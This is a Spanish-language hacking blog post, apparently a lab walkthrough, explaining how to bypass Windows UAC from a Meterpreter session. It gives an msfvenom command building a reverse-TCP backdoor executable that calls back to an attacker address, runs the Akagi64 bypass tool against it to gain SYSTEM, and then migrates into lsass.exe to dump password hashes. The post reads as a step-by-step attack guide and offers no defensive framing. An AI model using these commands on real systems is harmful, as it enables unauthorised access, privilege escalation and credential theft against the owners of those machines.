Curiosidades De Hackers
ESCALADA DE PRIVILEGIOS WINDOWSWINDOWS

UAC Bypass


Supongamos que estamos dentro de una sesión de meterpreter de una máquina Windows:

Y queremos ejecutar el comando getsystem, donde veremos que nos da error porque ha saltado el UAC:

Por tanto, el primer paso será generar el payload con msfvenom en formato .exe, para pasárselo a la herramienta que usaremos más tarde:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.3 LPORT=4444 -f exe > 'backdoor.exe'

Y ahora subimos este payload como también la herramienta para hacer el bypass llamada Akagi64.exe, ubicándonos en /temp porque allí tenemos permisos de escritura:

Una vez hecho esto, nos pondremos otra vez en escucha con metasploit para recibir esta nueva conexión:

Y ahora desde la otra sesión de meterpreter, ejecutamos el Akagi64.exe pasándole la backdoor.exe que hemos subido anteriormente:

Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe

Recibimos la conexión y ahora sí podemos ejecutar el comando getsystem:

Y también podemos migrarnos al proceso lsass.exe para dumpear hashes:


Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *